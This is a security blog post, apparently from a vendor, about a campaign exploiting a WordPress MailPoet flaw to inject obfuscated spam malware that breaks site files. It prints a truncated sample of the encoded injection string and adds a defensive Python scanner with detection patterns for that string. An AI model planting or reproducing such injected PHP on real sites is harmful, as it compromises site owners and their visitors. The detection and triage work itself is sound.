Update: We identified the root cause: MailPoet Vulnerability Exploited in the Wild – Breaking Thousands of WordPress Sites.
The last few days have brought a massive influx of broken WordPress websites. What makes this campaign unusual is that the malicious payload is being blindly injected into files, which is breaking the websites it lands on. While we are still researching, we want to share some observations:
- This infection is aimed at websites built on the popular WordPress CMS.
- It is targeting sites with outdated (vulnerable) plugins or weak admin passwords.
- The malware is highly obfuscated and attempts to inject spam into the hacked website.
There is, however, one very unpleasant side effect of this infection. The infector PHP code is buggy and corrupts legitimate website files. It targets not only the core WordPress files, but also theme and plugin files. The result is that various PHP errors are displayed instead of the normal site content. If you see an error like this on your site…
Parse error: syntax error, unexpected ')' in /home/user/public_html/site/wp-config.php on line 91
… it means your site has very likely been hacked. Our SiteCheck scanner will warn of this error as well:
The only known solution (after removal of the injected malware) is restoring the corrupted files from a clean backup. If you are curious about the malware injection, this is what it looks like (the variable name and the encoded string are randomly generated):
<?php $pblquldqei = '5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x782421787825!|!*!***b%x5c%x7825)…
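To triage a site like the ones described above, a practitioner wants two lists: the PHP files that carry the obfuscated injection, and the PHP files that no longer parse because the buggy infector damaged them. The script below is an added example written for this post; it is not Sucuri's own tooling and it does not decode the payload. It flags files by the shape visible in the sample (an open tag, a random variable name, and a long string built from `%x` plus two hex digits), and, when a `php` binary is on the PATH, runs `php -l` on every file so the corrupted ones surface as well. The token threshold, the regular expressions, the file names and the sample file contents are all assumptions constructed for the example; the "payload" bytes in `INFECTED_SOURCE` are made up and only imitate the pattern, they are not the real malware.

```python
#!/usr/bin/env python3
"""Triage helper for the blind PHP injection discussed in the post.

Added example, not Sucuri's tooling. It flags files carrying the
'%x5c%x7824'-style obfuscated string and, when php is available, lints
every file so the corrupted ones (the 'unexpected )' parse errors) are
listed too. Thresholds, patterns and sample inputs are assumptions.
"""
import re
import shutil
import subprocess
from pathlib import Path

# '%x' followed by two hex digits: the building block of the string in the post.
HEX_TOKEN = re.compile(r"%x[0-9a-f]{2}", re.I)
# "<?php $randomname = '<long string>'": the shape of the injected header.
INJECT_HEAD = re.compile(
    r"<\?php\s+\$[a-z_]\w{5,}\s*=\s*['\"][^'\"]{40,}['\"]", re.I
)
# Assumed threshold: legitimate WordPress files do not contain this many tokens.
MIN_HEX_TOKENS = 20


def score_source(src: str) -> dict:
    """Return indicators for one PHP source text (pure function, no I/O)."""
    hex_tokens = len(HEX_TOKEN.findall(src))
    open_tags = src.count("<?php")          # a clean wp-config.php has exactly one
    injected_head = INJECT_HEAD.search(src) is not None
    suspicious = hex_tokens >= MIN_HEX_TOKENS or (injected_head and hex_tokens > 0)
    return {
        "hex_tokens": hex_tokens,
        "open_tags": open_tags,
        "injected_head": injected_head,
        "suspicious": suspicious,
    }


def php_lint(path: Path):
    """Run 'php -l'. Returns True (parses), False (parse error) or None when
    no php binary is on PATH, so the scan still works offline."""
    php = shutil.which("php")
    if php is None:
        return None
    proc = subprocess.run([php, "-l", str(path)], capture_output=True, text=True)
    return proc.returncode == 0


def scan_tree(root: Path) -> dict:
    """Map each .php file under root (relative path) to its indicators."""
    results = {}
    for path in sorted(root.rglob("*.php")):
        src = path.read_text(encoding="utf-8", errors="replace")
        info = score_source(src)
        info["lint_ok"] = php_lint(path)
        results[str(path.relative_to(root))] = info
    return results


# Constructed samples: a clean wp-config.php fragment, and the same file with an
# injected header shaped like the one in the post. The payload bytes are made up.
CLEAN_SOURCE = (
    "<?php\n"
    "define('DB_NAME', 'wp');\n"
    "require_once ABSPATH . 'wp-settings.php';\n"
)
INFECTED_SOURCE = (
    "<?php $pblquldqei = '" + "5c%x7824-%x5c%x7824*!|!" * 8 + "'; ?>\n"
    + CLEAN_SOURCE
)


def demo(tmp_root: Path) -> dict:
    """Write the two samples under tmp_root and scan the tree."""
    (tmp_root / "wp-content").mkdir(parents=True, exist_ok=True)
    (tmp_root / "wp-config.php").write_text(CLEAN_SOURCE)
    (tmp_root / "wp-content" / "index.php").write_text(INFECTED_SOURCE)
    return scan_tree(tmp_root)


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as d:
        for name, info in demo(Path(d)).items():
            flag = "INFECTED?" if info["suspicious"] else "ok"
            print(f"{flag:10} {name}  hex_tokens={info['hex_tokens']} "
                  f"open_tags={info['open_tags']} lint_ok={info['lint_ok']}")
```

Run it against a copy of the document root (`scan_tree(Path('/home/user/public_html/site'))`) rather than the live tree, and treat every file with `suspicious` set or `lint_ok == False` as a candidate for restoration from the clean backup; a second `<?php` tag in a file that should contain one is a cheap extra signal that something was prepended. Heuristics like these catch only this pattern family, so a clean lint and a zero token count do not prove a file is untouched.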
We'll continue the investigation and provide more details as they become available. If you suspect you have been impacted by this infection, rest assured that our team is ready and is actively cleaning up this mess on all affected websites.